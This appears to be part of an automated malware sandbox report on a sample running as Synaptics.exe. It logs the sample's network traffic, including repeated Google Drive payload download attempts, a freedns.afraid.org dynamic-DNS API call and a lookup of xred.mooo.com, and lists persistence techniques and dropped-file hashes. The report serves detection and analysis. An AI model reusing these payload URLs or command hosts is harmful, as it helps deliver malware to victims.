Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
-
Remote address:8.8.8.8:53Requesto.pki.googIN AResponseo.pki.googIN CNAMEpki-goog.l.google.compki-goog.l.google.comIN A142.250.179.67
-
GEThttp://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyfSynaptics.exeRemote address:142.250.179.67:80RequestGET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: o.pki.goog
ResponseHTTP/1.1 200 OK
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Tue, 31 Dec 2024 02:28:29 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 410
-
GEThttp://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUCSynaptics.exeRemote address:142.250.179.67:80RequestGET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: o.pki.goog
ResponseHTTP/1.1 200 OK
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Tue, 31 Dec 2024 02:20:41 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 878
-
Remote address:8.8.8.8:53Requestdrive.usercontent.google.comIN AResponsedrive.usercontent.google.comIN A142.250.74.225
-
GEThttps://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSynaptics.exeRemote address:142.250.74.225:443RequestGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Connection: Keep-Alive
Cache-Control: no-cache
Host: drive.usercontent.google.com
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 31 Dec 2024 02:35:20 GMT
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: script-src 'report-sample' 'nonce-3NRCPQkSZPsetrq2a-U0JQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Length: 1652
Server: UploadServer
Set-Cookie: NID=520=Wjug36hbPzv8XLExjBSHAdBwYsEfecKyGf9fCR_xNVL7RM2TxtsoMp8iG4TWIsiFPhyqq5c7q9Ka9YUoDC-um1DkyCWLZ5nj28p6k_vUFeSu0nQeB-s85dDHem7GA1T5XAA0KVQAXgvkoPYkLMwebZUm2eJ0GGCtQAYSdsHni1wkhV6H; expires=Wed, 02-Jul-2025 02:35:20 GMT; path=/; domain=.google.com; HttpOnly
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
-
GEThttps://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSynaptics.exeRemote address:142.250.74.225:443RequestGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: drive.usercontent.google.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: NID=520=Wjug36hbPzv8XLExjBSHAdBwYsEfecKyGf9fCR_xNVL7RM2TxtsoMp8iG4TWIsiFPhyqq5c7q9Ka9YUoDC-um1DkyCWLZ5nj28p6k_vUFeSu0nQeB-s85dDHem7GA1T5XAA0KVQAXgvkoPYkLMwebZUm2eJ0GGCtQAYSdsHni1wkhV6H
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 31 Dec 2024 02:35:20 GMT
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-eKqNRl5_BU2pt55nKbnwsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
-
GEThttps://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSynaptics.exeRemote address:142.250.74.225:443RequestGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: drive.usercontent.google.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: NID=520=Wjug36hbPzv8XLExjBSHAdBwYsEfecKyGf9fCR_xNVL7RM2TxtsoMp8iG4TWIsiFPhyqq5c7q9Ka9YUoDC-um1DkyCWLZ5nj28p6k_vUFeSu0nQeB-s85dDHem7GA1T5XAA0KVQAXgvkoPYkLMwebZUm2eJ0GGCtQAYSdsHni1wkhV6H
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 31 Dec 2024 02:35:20 GMT
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'report-sample' 'nonce-4uqzMG7j4EZX7EUGm22Y_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
-
Remote address:8.8.8.8:53Requestwww.microsoft.comIN AResponsewww.microsoft.comIN CNAMEwww.microsoft.com-c-3.edgekey.netwww.microsoft.com-c-3.edgekey.netIN CNAMEwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netIN CNAMEe13678.dscb.akamaiedge.nete13678.dscb.akamaiedge.netIN A95.100.245.144
-
Remote address:95.100.245.144:80RequestGET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Mon, 03 Jun 2024 21:25:24 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-MD5: PjrtHAukbJio72s77Ag5mA==
Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
ETag: 0x8DCFA0366D6C4CA
x-ms-request-id: 7ca9c103-d01e-0016-3fee-2ba13d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 31 Dec 2024 02:35:50 GMT
Connection: keep-alive
TLS_version: UNKNOWN
ms-cv: CASMicrosoftCV9220b1b3.0
ms-cv-esi: CASMicrosoftCV9220b1b3.0
X-RTag: RT
-
Remote address:8.8.8.8:53Requestcrl.microsoft.comIN AResponsecrl.microsoft.comIN CNAMEcrl.www.ms.akadns.netcrl.www.ms.akadns.netIN CNAMEa1363.dscg.akamai.neta1363.dscg.akamai.netIN A88.221.134.83a1363.dscg.akamai.netIN A88.221.134.146
-
Remote address:88.221.134.83:80RequestGET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-MD5: +oTkvMkqpdtzWrUHEQQM3g==
Last-Modified: Thu, 12 Dec 2024 00:06:56 GMT
ETag: 0x8DD1A40E476D877
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 729f9bbc-001e-0005-142b-4c8531000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 31 Dec 2024 02:35:50 GMT
Connection: keep-alive
-
69.42.215.252:80http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978httpSynaptics.exe752 B 415 B 13 4
HTTP Request
GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978HTTP Response
200 -
152 B 3
-
152 B 3
-
216.58.214.174:443https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtls, httpSynaptics.exe1.8kB 11.2kB 13 15
HTTP Request
GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHTTP Response
303HTTP Request
GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHTTP Response
303HTTP Request
GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHTTP Response
303 -
348 B 1.7kB 5 4
HTTP Request
GET http://c.pki.goog/r/r1.crlHTTP Response
200 -
142.250.179.67:80http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUChttpSynaptics.exe780 B 1.6kB 7 4
HTTP Request
GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyfHTTP Response
200HTTP Request
GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUCHTTP Response
200 -
142.250.74.225:443https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtls, httpSynaptics.exe2.0kB 14.5kB 14 21
HTTP Request
GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHTTP Response
404HTTP Request
GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHTTP Response
404HTTP Request
GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHTTP Response
404 -
152 B 3
-
393 B 1.7kB 4 4
HTTP Request
GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crlHTTP Response
200 -
399 B 1.7kB 4 4
HTTP Request
GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crlHTTP Response
200 -
152 B 3
-
152 B 3
-
59 B 118 B 1 1
DNS Request
xred.mooo.com
-
64 B 80 B 1 1
DNS Request
freedns.afraid.org
DNS Response
69.42.215.252
-
61 B 77 B 1 1
DNS Request
docs.google.com
DNS Response
216.58.214.174
-
56 B 107 B 1 1
DNS Request
c.pki.goog
DNS Response
142.250.179.67
-
56 B 107 B 1 1
DNS Request
o.pki.goog
DNS Response
142.250.179.67
-
74 B 90 B 1 1
DNS Request
drive.usercontent.google.com
DNS Response
142.250.74.225
-
63 B 230 B 1 1
DNS Request
www.microsoft.com
DNS Response
95.100.245.144
-
63 B 162 B 1 1
DNS Request
crl.microsoft.com
DNS Response
88.221.134.8388.221.134.146
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.6MB
MD527bcc0d927e9f13250b1dff9e122e9af
SHA12f9f09f46fe7ee2a495247292b3f2be0777c2873
SHA25671c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1
SHA5121bdf5d3ba61b8d99955b92b87377fcbea08db248aae1089a9028a0613eb06c43e330bd781edf66ec955b1042c811094207b8962e391b37fc516a4b93664c7653
-
Filesize
17KB
MD5e566fc53051035e1e6fd0ed1823de0f9
SHA100bc96c48b98676ecd67e81a6f1d7754e4156044
SHA2568e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15
SHA512a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04
-
Filesize
21KB
MD589881af0e37940e7e3eacabc5662446a
SHA14b29c5e2c5c332e3732eff5d633a5bf075aa124b
SHA256df995f102d99266843836e1a559dcb69e808804c887b8862a7cd797a84fa0e5c
SHA5127daf492500bfa0c6555c4bb612b17e9d33c9ca5b6253bc765b70b52f9aa1c92d22a88da5ac3a54aa8102a955b422d9431985e9a8f8db7abca0f48bf0128ef93a
-
Filesize
23KB
MD53fa206d6d71483c5e2e2d0bc116754da
SHA1acc7080ab932c25c85323153b6048fe04253171f
SHA256ed87ac925bf1fd6e4d7c90603e30fb8bce12923111d2548e62e3b31d1c0c8e57
SHA5124c6a4160b39b86088ebbaf15da9e302e3eebeac6c4f39f0b91dab19d0a2219ad107895821dca11055452754416152f03a7e9603348c52b0761392cf248567f97
-
Filesize
22KB
MD598ca2edb24cf9732c8d4e2e61efc2767
SHA1bb688133039387c6782008739b6436cfc9403256
SHA2565dc46e0506f898716d26c317f1752687b8307d369350d03e0011c255b986900a
SHA5128bded5dc4e743ef39d0d8380767ed97990275ac48923cd8a2541c637501cb96184dc796a82078f2800fc69939d9d9300b368ecaedb96f8eaaa9266a35e3c0acf
-
Filesize
22KB
MD54fed354895f30d84701c4de8c18ebca6
SHA13a5751f6ef8b9a25d12c99e1a437fd3c2b19e0f9
SHA256f916c146c34f8abee2c7c7279d96898db5feede41ed5dae66fa3be6bbaa16058
SHA512c07f787f70922ba4df6c0a451783b3b1830869f63c73d7ca5a2b37bd2ed564ccf57684e1afd9f3e5fc7311f22efba5db999409163fdca49e7b677eae5c5582a9
-
Filesize
964B
MD5d24e332b790bae46b2ce6cfe94a87f23
SHA11ac976f41b7d37aec4d95eb439bc8fadee11b1cf
SHA256026bee439844067dcfb04c9cb9c5e20398b67e2225d0b857d66f0c85b7eff11d
SHA5124aefd45dad7df7ae105ffc152f216187c7bd3923b508472ca587c79a98459e90dc4150ae9703afad766f6bde9082b272619f9758e8f464eeadad07e828db4552
-
Filesize
165B
MD5ff09371174f7c701e75f357a187c06e8
SHA157f9a638fd652922d7eb23236c80055a91724503
SHA256e4ba04959837c27019a2349015543802439e152ddc4baf4e8c7b9d2b483362a8
SHA512e4d01e5908e9f80b7732473ec6807bb7faa5425e3154d5642350f44d7220af3cffd277e0b67bcf03f1433ac26a26edb3ddd3707715b61d054b979fbb4b453882
-
\Users\Admin\AppData\Local\Temp\._cache_71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1.exe
Filesize893KB
MD5541fc19be6471027afb1dd324e4a8a80
SHA1ed39e0a9aa016595f1ead34c221ce0b878e7cf64
SHA2560a438a59e23472911fd3e08a50f58cad8008d01733a1159bb20b06b20b21aac0
SHA512da7965709aded6570c282e02536e2fcdf51e6a42ced919adf75be4fb694017bcd332c229db4b07684265b471df6d2001d62a1c5327cd93f35520ff4fad83e086